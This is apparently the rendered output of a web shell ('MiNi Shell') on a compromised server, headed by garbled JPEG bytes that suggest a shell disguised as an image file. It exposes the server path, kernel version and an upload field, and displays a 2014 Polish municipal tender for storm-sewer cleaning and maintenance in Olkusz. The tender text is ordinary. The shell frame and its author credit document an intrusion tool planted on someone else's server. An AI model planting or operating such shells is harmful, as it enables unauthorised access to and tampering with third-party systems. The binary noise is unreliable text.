JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140204/39242-N-2014.html

<p class="kh_header"><b>Olkusz: Bieżąca konserwacja i eksploatacja kanalizacji deszczowej oraz usuwanie awarii.</b><br>
<b>Numer ogłoszenia: 39242 - 2014; data zamieszczenia: 04.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Olkusz , ul. Rynek 1, 32-300 Olkusz, woj. małopolskie, tel. 32 626 01 00 w.311, 626 01 61, faks 32 626 01 03, 626 02 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umig.olkusz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżąca konserwacja i eksploatacja kanalizacji deszczowej oraz usuwanie awarii..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są zadania:
Zadanie 1.  Czyszczenie kanalizacji deszczowej w Olkuszu.
Zadanie 2.  Utrzymanie kanalizacji deszczowej w Olkuszu.  
2.W zakres prac wchodzi w szczególności:
Zadanie 1.  
a. czyszczenie kolektorów od d-200 mm do d-1400 mm wraz z czyszczeniem studni kanalizacyjnych zlokalizowanych na kolektorze
b. czyszczenie studzienek wpustów ulicznych wraz z mechanicznym  
czyszczeniem przykanalika
c. czyszczenie studni kanalizacyjnych
d. czyszczenie odwodnień liniowych
e. czyszczenie komór kanalizacji deszczowej
f. mechaniczne wycinanie korzeni
g. czyszczenie separatora koalescencyjnego
1. Szczegółowy rodzaj robót objętych przetargiem oraz szacunkowe ilości wyszczególnione są w kosztorysie ofertowym dla zadania 1. Ilości robót objętych przetargiem są ilościami orientacyjnymi (przewidywanymi w załączniku nr 1 do umowy) i mogą ulec zmianie w zależności od potrzeb Zamawiającego.

2. Wykonawca zobowiązany będzie do przeglądów kanalizacji i objazdu dróg objętych umową  (własnym pojazdem) wraz z przedstawicielem Zamawiającego 2 razy w miesiącu w terminie uzgodnionym z Zamawiającym bez dodatkowego wynagrodzenia. Z objazdu zostanie sporządzony protokół przeglądu i typowania robót określający zakres i termin wykonania, jednak przystąpienie do prac określonych w protokole ma odbyć się w terminie do 7 dni od daty sporządzonego protokołu typowania.

3. W przypadkach zagrażających bezpieczeństwu ruchu po zgłoszeniu telefonicznym przez Zamawiającego, Wykonawca dokona zabezpieczenia miejsca zagrożenia poprzez oznakowanie, obarierowanie, przykrycie, oświetlenie w czasie do 1,5 godz. od momentu powiadomienia przez Zamawiającego. Usunięcie zagrożenia nastąpi w zakresie i terminie wskazanym przez Zamawiającego w protokole typowania robót spisanym bezpośrednio po zabezpieczeniu ; lecz nie później niż 3 dni od dokonania zabezpieczenia.

4. W kalkulacji kosztów wykonania przedmiotowego zamówienia należy uwzględnić wszystkie koszty, w tym również związane z oznakowaniem robót  zgodnie  z  instrukcją  oznakowania  robót  prowadzonych  w  pasie  drogowym, a  przypadku  konieczności  zmiany  organizacji  ruchu  na  czas  budowy uwzględnić  koszty sporządzenia we własnym zakresie i zatwierdzenia  projektu  zmiany   organizacji  ruchu   oraz  wykonanie   oznakowania  zgodnie  z  tym  projektem   wraz   z  jego  bieżącym  utrzymaniem.

5. Oferowana cena jednostkowa wykonania przedmiotowego zakresu robót podana w formularzu cenowym, powinna być sporządzona w oparciu o SIWZ i oględziny w terenie.

Wszystkie prace należy wykonać zgodnie z obowiązującą wiedzą techniczną i zasadami sztuki budowlanej.

Zadanie 2.  
a.wykonanie analiz fizyko-chemicznych wody z koryta rzeki (analiza uwzględnia pobranie próby wody przed oraz za zrzutem (odczyn Ph , BZT5 , CHZT ,zawiesina ,ekstrakt eterowy , substancje ropopochodne , azot ogólny , fosfor ogólny)
b. uzupełnienie pokryw betonowych d-800 wraz z obetonowaniem
c. uzupełnienie , wymiana kratek wpustów ulicznych żeliwnych i betonowych
d. wymiana kratek wpustów ulicznych wraz  z korpusem i asfaltowaniem
e. uzupełnienie , wymiana włazu żeliwnego typu ciężkiego
f.  wymiana włazu żeliwnego typu ciężkiego wraz z pierścieniami i asfaltowaniem
g. usuwanie awarii kanalizacji deszczowej
h. utrzymanie zbiornika podczyszczającego
i. regulacja wpustu ulicznego żeliwnego 
j. regulacja studni
1. Szczegółowy rodzaj robót objętych przetargiem oraz szacunkowe ilości wyszczególnione są w kosztorysie ofertowym dla zadania 2. Ilości robót objętych przetargiem są ilościami orientacyjnymi (przewidywanymi w załączniku nr 1)  i mogą ulec zmianie w zależności od potrzeb Zamawiającego.

2. Wykonawca zobowiązany będzie do przeglądów kanalizacji i objazdu dróg objętych umową  (własnym pojazdem) wraz z przedstawicielem Zamawiającego 2 razy w miesiącu w terminie uzgodnionym z Zamawiającym bez dodatkowego wynagrodzenia. Z objazdu zostanie sporządzony protokół przeglądu i typowania robót określający zakres i termin wykonania, jednak przystąpienie do prac określonych w protokole ma odbyć się w terminie do 7 dni od daty sporządzonego protokołu typowania.

3. W przypadkach zagrażających bezpieczeństwu ruchu po zgłoszeniu telefonicznym przez Zamawiającego, Wykonawca dokona zabezpieczenia miejsca zagrożenia poprzez oznakowanie, obarierowanie, przykrycie, oświetlenie w czasie do 1,5 godz. od momentu powiadomienia przez Zamawiającego. Usunięcie zagrożenia nastąpi w zakresie i terminie wskazanym przez Zamawiającego w protokole typowania robót spisanym bezpośrednio po zabezpieczeniu ; lecz nie później niż 3 dni od dokonania zabezpieczenia.

4. W kalkulacji kosztów wykonania przedmiotowego zamówienia należy uwzględnić wszystkie koszty, w tym również związane z oznakowaniem robót  zgodnie  z  instrukcją  oznakowania  robót  prowadzonych  w  pasie  drogowym, a  przypadku  konieczności  zmiany  organizacji  ruchu  na  czas  budowy uwzględnić  koszty sporządzenia we własnym zakresie i zatwierdzenia  projektu  zmiany   organizacji  ruchu   oraz  wykonanie   oznakowania  zgodnie  z  tym  projektem   wraz   z  jego  bieżącym  utrzymaniem.

5. Oferowana cena jednostkowa wykonania przedmiotowego zakresu robót podana w formularzu cenowym, powinna być sporządzona w oparciu o SIWZ i oględziny w terenie.

6. Zamawiający wymaga, aby Wykonawca udzielił gwarancji na prace określone w § 1 ust.2 Zadanie 2, lit. b, c, d, e, f, g, i, j, umowy będącej zał. nr 5 do SIWZ, przez okres min. 3 lat od dnia dokonania odbioru końcowego.

7.Zamawiający wymaga, aby zabudowane przez Wykonawcę materiały posiadały wymagane prawem świadectwa jakości, które zostaną dołączone każdorazowo do protokołu odbioru końcowego robót.    

Wszystkie prace należy wykonać zgodnie z obowiązującą wiedzą techniczną i zasadami sztuki budowlanej..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających polegających na powtórzeniu usług tego samego rodzaju zamówień  i stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.30.00-0, 90.40.00.00-1, 90.47.00.00-2, 44.13.00.00-0, 90.64.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zadanie 1- 780,00 zł
Zadanie 2- 2700,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na przedmiot zamówienia zamawiający nie dokonuje opisu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 pkt.  1,2 i 4 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na przedmiot zamówienia zamawiający nie dokonuje opisu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 pkt.  1,2 i 4 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga w szczególności dysponowania osobą /osobami  posiadającą/ posiadającymi uprawnienia budowlane do kierowania robotami w zakresie instalacyjno - inżynieryjnej w specjalności wod.-kan.

Wykonawca powinien wykazać, że dysponuje osobami posiadającymi uprawnienia budowlane do kierowania robotami w zakresie instalacyjno - inżynieryjnej w specjalności wod.-kan. załączając  zał. nr 7 zawierający co najmniej : imiona  i nazwiska osób,  numery i zakresy  uprawnień budowlanych wraz z określeniem przez kogo zostały wydane, numery i daty ważności zaświadczeń o przynależności do właściwych izb samorządu zawodowego oraz informację  o podstawie do dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na przedmiot zamówienia zamawiający nie dokonuje opisu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 pkt.  1,2 i 4 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pełnomocnictwo do podpisania oferty- jeśli dotyczy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.9</li>
<li>2 - Czynniki cenotwórcze - 0.1</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może ulec zmianie w zakresie wysokości wynagrodzenia w przypadku, gdy ilość robót będzie różna od szacowanych przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wrotamalopolski.pl/bip.olkusz<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można odebrać w UMiG Olkusz w pokoju nr 311 lub pobrać ze strony internetowej..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.02.2014 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego pod adresem: Urząd Miasta i Gminy w Olkuszu, Rynek 1, 32-300 Olkusz w punkcie informacyjno-podawczym..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Czyszczenie kanalizacji deszczowej w Olkuszu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1.  
a. czyszczenie kolektorów od d-200 mm do d-1400 mm wraz z czyszczeniem studni kanalizacyjnych zlokalizowanych na kolektorze
b. czyszczenie studzienek wpustów ulicznych wraz z mechanicznym  
czyszczeniem przykanalika
c. czyszczenie studni kanalizacyjnych
d. czyszczenie odwodnień liniowych
e. czyszczenie komór kanalizacji deszczowej
f. mechaniczne wycinanie korzeni
g. czyszczenie separatora koalescencyjnego
1. Szczegółowy rodzaj robót objętych przetargiem oraz szacunkowe ilości wyszczególnione są w kosztorysie ofertowym dla zadania 1. Ilości robót objętych przetargiem są ilościami orientacyjnymi (przewidywanymi w załączniku nr 1 do umowy) i mogą ulec zmianie w zależności od potrzeb Zamawiającego.

2. Wykonawca zobowiązany będzie do przeglądów kanalizacji i objazdu dróg objętych umową  (własnym pojazdem) wraz z przedstawicielem Zamawiającego 2 razy w miesiącu w terminie uzgodnionym z Zamawiającym bez dodatkowego wynagrodzenia. Z objazdu zostanie sporządzony protokół przeglądu i typowania robót określający zakres i termin wykonania, jednak przystąpienie do prac określonych w protokole ma odbyć się w terminie do 7 dni od daty sporządzonego protokołu typowania.

3. W przypadkach zagrażających bezpieczeństwu ruchu po zgłoszeniu telefonicznym przez Zamawiającego, Wykonawca dokona zabezpieczenia miejsca zagrożenia poprzez oznakowanie, obarierowanie, przykrycie, oświetlenie w czasie do 1,5 godz. od momentu powiadomienia przez Zamawiającego. Usunięcie zagrożenia nastąpi w zakresie i terminie wskazanym przez Zamawiającego w protokole typowania robót spisanym bezpośrednio po zabezpieczeniu ; lecz nie później niż 3 dni od dokonania zabezpieczenia.

4. W kalkulacji kosztów wykonania przedmiotowego zamówienia należy uwzględnić wszystkie koszty, w tym również związane z oznakowaniem robót  zgodnie  z  instrukcją  oznakowania  robót  prowadzonych  w  pasie  drogowym, a  przypadku  konieczności  zmiany  organizacji  ruchu  na  czas  budowy uwzględnić  koszty sporządzenia we własnym zakresie i zatwierdzenia  projektu  zmiany   organizacji  ruchu   oraz  wykonanie   oznakowania  zgodnie  z  tym  projektem   wraz   z  jego  bieżącym  utrzymaniem.

5. Oferowana cena jednostkowa wykonania przedmiotowego zakresu robót podana w formularzu cenowym, powinna być sporządzona w oparciu o SIWZ i oględziny w terenie.

Wszystkie prace należy wykonać zgodnie z obowiązującą wiedzą techniczną i zasadami sztuki budowlanej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.30.00-0, 90.40.00.00-1, 90.47.00.00-2, 44.13.00.00-0, 90.64.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.9</li>
<li>2. Czynniki cenotwórcze - 0.1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Utrzymanie kanalizacji deszczowej w Olkuszu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2.  
a.wykonanie analiz fizyko-chemicznych wody z koryta rzeki (analiza uwzględnia pobranie próby wody przed oraz za zrzutem (odczyn Ph , BZT5 , CHZT ,zawiesina ,ekstrakt eterowy , substancje ropopochodne , azot ogólny , fosfor ogólny)
b. uzupełnienie pokryw betonowych d-800 wraz z obetonowaniem
c. uzupełnienie , wymiana kratek wpustów ulicznych żeliwnych i betonowych
d. wymiana kratek wpustów ulicznych wraz  z korpusem i asfaltowaniem
e. uzupełnienie , wymiana włazu żeliwnego typu ciężkiego
f.  wymiana włazu żeliwnego typu ciężkiego wraz z pierścieniami i asfaltowaniem
g. usuwanie awarii kanalizacji deszczowej
h. utrzymanie zbiornika podczyszczającego
i. regulacja wpustu ulicznego żeliwnego 
j. regulacja studni
1. Szczegółowy rodzaj robót objętych przetargiem oraz szacunkowe ilości wyszczególnione są w kosztorysie ofertowym dla zadania 2. Ilości robót objętych przetargiem są ilościami orientacyjnymi (przewidywanymi w załączniku nr 1)  i mogą ulec zmianie w zależności od potrzeb Zamawiającego.

2. Wykonawca zobowiązany będzie do przeglądów kanalizacji i objazdu dróg objętych umową  (własnym pojazdem) wraz z przedstawicielem Zamawiającego 2 razy w miesiącu w terminie uzgodnionym z Zamawiającym bez dodatkowego wynagrodzenia. Z objazdu zostanie sporządzony protokół przeglądu i typowania robót określający zakres i termin wykonania, jednak przystąpienie do prac określonych w protokole ma odbyć się w terminie do 7 dni od daty sporządzonego protokołu typowania.

3. W przypadkach zagrażających bezpieczeństwu ruchu po zgłoszeniu telefonicznym przez Zamawiającego, Wykonawca dokona zabezpieczenia miejsca zagrożenia poprzez oznakowanie, obarierowanie, przykrycie, oświetlenie w czasie do 1,5 godz. od momentu powiadomienia przez Zamawiającego. Usunięcie zagrożenia nastąpi w zakresie i terminie wskazanym przez Zamawiającego w protokole typowania robót spisanym bezpośrednio po zabezpieczeniu ; lecz nie później niż 3 dni od dokonania zabezpieczenia.

4. W kalkulacji kosztów wykonania przedmiotowego zamówienia należy uwzględnić wszystkie koszty, w tym również związane z oznakowaniem robót  zgodnie  z  instrukcją  oznakowania  robót  prowadzonych  w  pasie  drogowym, a  przypadku  konieczności  zmiany  organizacji  ruchu  na  czas  budowy uwzględnić  koszty sporządzenia we własnym zakresie i zatwierdzenia  projektu  zmiany   organizacji  ruchu   oraz  wykonanie   oznakowania  zgodnie  z  tym  projektem   wraz   z  jego  bieżącym  utrzymaniem.

5. Oferowana cena jednostkowa wykonania przedmiotowego zakresu robót podana w formularzu cenowym, powinna być sporządzona w oparciu o SIWZ i oględziny w terenie.

6. Zamawiający wymaga, aby Wykonawca udzielił gwarancji na prace określone w § 1 ust.2 Zadanie 2, lit. b, c, d, e, f, g, i, j, umowy będącej zał. nr 5 do SIWZ, przez okres min. 3 lat od dnia dokonania odbioru końcowego.

7.Zamawiający wymaga, aby zabudowane przez Wykonawcę materiały posiadały wymagane prawem świadectwa jakości, które zostaną dołączone każdorazowo do protokołu odbioru końcowego robót.    

Wszystkie prace należy wykonać zgodnie z obowiązującą wiedzą techniczną i zasadami sztuki budowlanej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.30.00-0, 90.40.00.00-1, 90.47.00.00-2, 44.13.00.00-0, 90.64.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.9</li>
<li>2. Czynniki cenotwórcze - 0.1</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com